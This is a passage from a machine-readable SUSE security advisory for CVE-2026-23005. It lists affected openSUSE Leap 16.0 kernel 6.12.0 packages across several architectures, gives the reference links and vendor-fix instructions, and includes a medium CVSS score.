"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23005",
"url": "https://www.suse.com/security/cve/CVE-2026-23005"
},
{
"category": "external",
"summary": "SUSE Bug 1257245 for CVE-2026-23005",
"url": "https://bugzilla.suse.com/1257245"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
